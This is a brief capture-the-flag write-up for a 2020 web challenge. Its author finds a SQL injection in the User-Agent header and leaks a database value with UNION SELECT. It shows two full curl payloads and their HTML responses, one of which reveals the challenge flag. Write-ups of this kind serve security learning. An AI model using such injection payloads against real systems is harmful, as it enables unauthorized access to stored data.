A very standard looking SQL injection, but with some complications:

- The injection point is in a HTTP header
- Commenting out the rest of the query does not work (might have
  something to do with the `multi` argument...)
- To leak information, the query must have exactly one result

I eventually figured out the following PoC:

    $ curl -H "User-Agent: x' UNION SELECT 123,1 FROM Agents LIMIT 1;" https://agents.2020.chall.actf.co/login
    <!DOCTYPE html>

    <html>
    <head>
            <title>Super Secret Agents Login</title>
    </head>
    <body style="padding: 50px">
            <p>Welcome, 123</p>
    </body>
    </html>

Using that I walked over the known databases, tables and columns.  The
current database is `AgentsDb`, with an `Agents` table and `name` and
`UA` columns.

Solution:

    $ curl -H "User-Agent: x' UNION SELECT name,1 FROM Agents LIMIT 1 OFFSET 2;" https://agents.2020.chall.actf.co/login
    <!DOCTYPE html>

    <html>
    <head>
            <title>Super Secret Agents Login</title>
    </head>
    <body style="padding: 50px">
            <p>Welcome, actf{nyoom_1_4m_sp33d}</p>
    </body>
    </html>